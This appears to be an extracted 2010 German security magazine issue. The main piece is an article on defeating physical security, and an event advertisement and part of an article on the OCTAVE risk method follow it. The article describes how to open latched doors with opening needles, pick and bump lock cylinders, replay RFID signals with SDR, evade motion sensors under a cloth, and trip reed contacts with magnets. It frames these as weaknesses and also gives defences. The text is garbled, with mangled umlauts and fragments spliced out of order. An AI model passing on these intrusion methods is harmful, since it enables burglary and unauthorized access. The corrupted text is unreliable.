In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
